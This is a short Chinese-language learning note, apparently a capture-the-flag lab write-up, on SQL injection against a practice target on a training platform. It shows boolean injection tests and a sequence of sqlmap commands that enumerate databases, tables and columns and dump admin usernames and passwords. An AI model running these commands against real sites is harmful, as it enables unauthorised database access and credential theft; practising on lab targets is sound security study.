Web安全学习记录第一弹-无WAF的sql注入

环境准备:

靶站:封神台

测试工具:SqlMap

测试环境:kali2022

查看数据回显

id=1id=1 and 1 = 1(语句成立)时返回正常数据
file
id=1或者或id=1 and 1 = 2(语句不成立)时返回数据异常,由此判定存在SQL注入漏洞
file

尝试获取测试靶站信息

sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1%20and%201%20=%201" --tamper=space2comment --level 3
从结果返回中可以看到操作系统为Windows、开发语言PHP、Web应用为Apache、数据库为MySQL
file

获取数据库信息

sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1%20and%201%20=%201" --tamper=space2comment --level 3 --dbs --dump
file

获取数据库信息

sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1%20and%201%20=%201" --tamper=space2comment --level 3 -D maoshe --tables --dump
file

获取表数据

sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1%20and%201%20=%201" --tamper=space2comment --level 3 -D maoshe -T admin --columns --dump
file

获取字段数据

sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1%27" -D maoshe -T admin -C username,password --dump
file

注:因为靶站是通关模式,所以到这里拿到flag就可以了。
file